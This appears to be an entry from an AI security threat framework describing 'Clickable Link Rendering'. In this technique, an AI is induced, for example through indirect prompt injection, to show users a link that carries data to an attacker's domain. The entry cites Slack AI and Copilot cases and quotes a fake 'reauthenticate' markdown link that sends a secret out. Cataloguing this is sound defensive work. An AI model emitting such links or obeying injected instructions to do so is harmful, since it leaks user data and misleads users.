Clickable Link Rendering
Type: technique
Description: The adversary gets AI to present a URL to the user, which is rendered as a link, and can be clicked by a user. The URL leads to an attacker-controlled website, allowing the adversary to exfiltrate data through URL parameters. Variants include HTML tags and markdown.
The URL can also lead to controlled domain, where the URL is automatically chosen based on answers to a series of questions the AI system answers, allowing the adversary to leak the answers to those questions by the choice of a granular web link.
Version: 0.1.0
Created At: 2025-07-23 10:23:39 -0400
Last Modified At: 2025-07-23 10:23:39 -0400
External References
Related Objects
- --> Exfiltration (tactic): An adversary can exfiltrate data by embedding it in the parameters of a URL, and getting AI to render it as a clickable link to the user, which clicks it.
- --> Content Security Policy (mitigation): Setting a Content Security Policy can mitigate this technique by disrupting an attacker's ability to provide a URL to a domain under their control.
- <-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Data to exfiltrate is embedded in a URL parameter, rendered as a clickable link through markdown:
Error loading message, [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti)
. - <-- Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information (procedure): Rendering of hyperlinks to attacker controlled domains, resulting in 1-click data exfiltration.